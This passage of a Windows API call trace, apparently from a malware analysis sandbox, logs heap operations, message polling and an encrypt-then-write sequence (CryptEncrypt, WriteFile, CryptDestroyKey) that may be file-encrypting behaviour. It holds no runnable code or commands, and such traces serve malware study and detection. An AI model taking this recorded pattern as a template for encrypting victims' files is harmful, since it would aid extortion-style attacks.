hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74088 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0103.692] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0103.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0103.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9df0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.692] CryptEncrypt (in: hKey=0x9a4780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xb5f0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xb5f8) returned 1 [0103.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.693] CharLowerBuffW (in: lpsz="byte[46584]", cchLength=0xb | out: lpsz="byte[46584]") returned 0xb [0103.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.694] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.694] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.694] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.694] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.694] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.694] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9dc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.694] CryptEncrypt (in: hKey=0x9a4780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xb5f0, dwBufLen=0xb5f8 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xb5f8) returned 1 [0103.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0103.787] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0103.787] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0103.787] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0103.787] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0103.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.787] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0103.787] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.787] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0103.787] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.787] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.787] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0103.787] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.787] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0103.787] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.787] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.788] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.788] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.788] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.788] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.788] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.788] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.792] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.792] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.792] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.793] WriteFile (in: hFile=0x44c, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0xb5f8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0xb5f8, lpOverlapped=0x0) returned 1 [0103.794] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.794] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.794] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0103.794] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.794] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0103.794] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.794] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.795] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.795] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0103.795] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.795] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0103.795] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0103.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9be0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0103.795] CryptDestroyKey (hKey=0x9a4780) returned 1 [0103.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0103.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0103.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0103.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0103.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0103.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0103.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0103.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0103.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0103.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0103.796] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0103.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0103.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0103.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0103.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0103.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0103.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0103.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0103.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0103.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.797] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0103.797] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0103.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0103.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743a0 [0103.797] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0103.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0103.798] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0103.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0103.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0103.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0103.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0103.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0103.798] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0103.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0103.798] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0103.798] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0103.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0103.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0103.798] 